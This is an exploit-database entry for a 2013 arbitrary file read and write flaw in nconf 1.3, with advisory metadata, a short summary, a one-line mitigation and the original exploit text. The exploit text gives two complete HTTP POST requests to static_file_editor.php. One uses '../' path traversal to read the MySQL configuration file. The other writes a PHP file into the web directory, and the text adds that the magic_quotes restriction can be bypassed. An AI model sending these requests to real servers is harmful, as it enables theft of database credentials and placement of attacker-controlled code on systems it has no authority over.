nconf file read and write exploit

vendor:

nconf

by:

haidao

7,5

CVSS

HIGH

File Read/Write

264

CWE

Product Name: nconf

Affected Version From: nconf 1.3

Affected Version To: nconf 1.3

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Apache/2.2.15 (Centos) PHP/5.3.3

2013

nconf file read and write exploit

nconf can modify the config file of nagios and save it to the server, but haven't check the file's direction and name, so we can read and write any files in the server under the privileges of apache. An attacker can send a POST request with the directory and filename to read the file or directory, or change the directory or filename. If the filename is null, the attacker can get a list of the directory. An attacker can also send a POST request with the directory, filename, action, and content to write the content into the file. If the magic_quote is on, the attacker must pay attention to the ' and ".

Mitigation:

Ensure that the file and directory permissions are properly configured and that the application is validating user input.

Source

Exploit-DB raw data:

# Exploit Title:  nconf  file read and wrtite exploit 
# Date: 2013/1/20
# Exploit Author: haidao，54haidao@gmail.com
# Software Link: http://sourceforge.net/projects/nconf/files/nconf/
# Version:    nconf 1.3
# Tested on: Server: Apache/2.2.15 (Centos)  PHP/5.3.3
 

nconf can modify the config file of nagios and save it to the server,but haven't check the file's direction and name  ,so we can  read and write any files in the server under the privileges of apache,

1,read the file or direction , change the directory or filename ,when filename is null , you get a list of the directory,

POST /nconf/static_file_editor.php HTTP/1.1
Host: 192.168.110.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.110.130/nconf/static_file_editor.php
Cookie: Cacti=0aj6jgsl3a61grcnmnl74pa9o6; PHPSESSID=2ss1u9lqeukh63i4khplveoh07
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
 
directory=static_cfg&filename=../config/mysql.php



2, write the content into the file .
attation: if the magic_quote is on ,, u must attation the ' and ",of course we can bypass it .

POST /nconf/static_file_editor.php HTTP/1.1
Host: 192.168.110.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.110.130/nconf/static_file_editor.php
Cookie: Cacti=0aj6jgsl3a61grcnmnl74pa9o6; PHPSESSID=2ss1u9lqeukh63i4khplveoh07
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
 
directory=static_cfg&filename=s.php&action=Save&content=<?php phpinfo();?>